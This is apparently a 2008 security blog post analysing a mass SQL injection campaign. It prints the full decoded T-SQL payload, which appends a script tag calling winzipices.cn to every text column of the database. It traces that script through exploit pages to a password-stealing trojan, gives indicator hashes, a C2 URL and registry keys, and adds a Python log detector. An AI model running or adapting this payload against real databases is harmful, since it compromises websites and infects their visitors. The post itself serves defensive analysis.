Monday, May 12, 2008

winzipices.cn SQL injection

Mass SQL injection attacks continue....

SQL Injection:

Injected SQL statement:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(... [hex-encoded payload elided]

The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src="http: //winzipices[dot]cn/3.js"></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

The SQL injection appears to come from the automated CLI/SQL injection tool referenced at SANS. The user-agent utilized during injection was: Mozilla/3.0+(compatible;+Indy+Library)
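As an added example that is not part of the original post, the Python below decodes the CAST hex blob from a request of this shape (NVARCHAR means UTF-16LE on SQL Server, which is why the blob is twice the length of the statement) and flags a web-log line on the markers described above: the hex CAST/EXEC wrapper, a decoded statement that walks sysobjects/syscolumns, and the Indy Library user-agent. The sample statement and log lines are constructed for the example, not taken from the post.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Wrapper used by the campaign: DECLARE @S NVARCHAR(4000);SET @S=CAST(0x... AS NVARCHAR(4000));EXEC(@S);
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR\(\d+\)\)", re.IGNORECASE)
INDY_UA = re.compile(r"Indy[+ ]Library", re.IGNORECASE)
CURSOR_WALK = re.compile(r"sysobjects.*syscolumns", re.IGNORECASE | re.DOTALL)


def decode_cast_payload(request: str) -> Optional[str]:
    """Return the statement hidden in a CAST(0x... AS [N]VARCHAR) blob, or None if absent."""
    m = HEX_CAST.search(unquote(request))  # %20 etc. are URL-encoded in the raw log line
    if m is None:
        return None
    raw = bytes.fromhex(m.group(1))
    # NVARCHAR is UTF-16LE on SQL Server; VARCHAR is a single-byte code page.
    if m.group(2).upper() == "N":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def classify_request(log_line: str) -> List[str]:
    """Name the indicators of this campaign present in one web-log line."""
    hits = []
    payload = decode_cast_payload(log_line)
    if payload is not None:
        hits.append("hex-cast-exec")
        if CURSOR_WALK.search(payload):
            hits.append("sysobjects-cursor-walk")
    if INDY_UA.search(log_line):
        hits.append("indy-library-user-agent")
    return hits


# Constructed sample input (not from the original post): a shortened statement in the
# same shape as the decoded payload, hex-encoded exactly as the injection encoded it.
SAMPLE_STATEMENT = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'"
)
SAMPLE_HEX = SAMPLE_STATEMENT.encode("utf-16-le").hex().upper()
SAMPLE_LOG = (
    '192.0.2.10 - - [12/May/2008:10:00:00 +0000] "GET /page.asp?id=1;DECLARE%20@S%20'
    f"NVARCHAR(4000);SET%20@S=CAST(0x{SAMPLE_HEX}%20AS%20NVARCHAR(4000));EXEC(@S);-- "
    'HTTP/1.1" 200 512 "-" "Mozilla/3.0+(compatible;+Indy+Library)"'
)
BENIGN_LOG = '192.0.2.11 - - [12/May/2008:10:00:01 +0000] "GET /page.asp?id=1 HTTP/1.1" 200 512 "-" "Mozilla/4.0"'
```

Running `classify_request` over an IIS or Apache access log for the injection window gives the list of requests to trace back to the vulnerable page and parameter.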

winzipices.cn site code:
injected script: http: //winzipices[dot]cn/3.js

3.js returns iframe for http: //winzipices[dot]cn/3.asp

3.asp returns iframes for pp.htm and s.asp and a tracking script for http: //s126[dot]cnzz[dot]com/stat.php?id=888134&web_id=888134&show=pic1

pp.htm returns script reference for pp.js

pp.js does a browser check. IE6 goes to 6.gif, IE7 goes to 7.gif

6.gif returns a script reference for vv.js and iframes for le.gif, old.gif and xin.gif

7.gif returns iframes for old.gif and xin.gif

le.gif and vv.js return MDAC (MS06-014) exploit
old.gif returns RealPlayer exploit (CVE-2007-5601)
xin.gif returns RealPlayer exploit (CVE-2008-1309)

Payload for all is: http: //61[dot]188[dot]38[dot]158/images/test.exe

malware analysis:

Filename: test.exe
MD5: afdb42512a91ae960d07397226f24494
Size: 27.5 KB (28,237 bytes)

The file test.exe copies itself as c:\WINDOWS\Tasks\0x01xx8p.exe, hooks itself into spoolsv.exe, and receives instructions from http: //766598[dot]com/config.txt (222.187.105.196).

GET /config.txt HTTP/1.1
User-Agent: Downing
Host: 766598.com
Cache-Control: no-cache

config.txt returns commands for several connections:
http: //61[dot]188[dot]38[dot]158/images/test.exe
http: //winzipices[dot]cn/1.exe
http: //766598[dot]com/tongji/post.asp

new test.exe:
Filename: test.exe
MD5: 8ca53bf2b7d8107d106da2da0f8ca700
Size: 27.5 KB (28,237 bytes)

Filename: 1.exe (PSW.OnlineGames trojan)
MD5: 5c9322a95aaafbfabfaf225277867f5b
Size: 37.5 KB (38,400 bytes)

1.exe creates 3 tmp files: datx.tmp (x = number) with hooks into winlogin.exe

Filename: dat6.tmp
MD5: 96ee4d2d791d123c87692a5e838ed549
Size: 12.0 KB (12,288 bytes)

Filename: dat7.tmp
MD5: 9473d4397a0793c709a4ec365fb3f0d3
Size: 21.5 KB (22,016 bytes)

Filename: dat8.tmp
MD5: 69d308d862fefa4548d87545b387dda9
Size: 6.50 KB (6,656 bytes)

Registry:
HKEY_CLASSES_ROOT\CLSID\{E25C29AB-12B9-4523-A53C-324B5FBA648C}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp

Registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Shell"
Type: REG_SZ
Data: "C:\WINDOWS\System32\Rundll32.exe" "C:\WINDOWS\System32\shell32.dll",Control_RunDLL "C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp"

...all in an effort to drop a PSW.OnlineGames trojan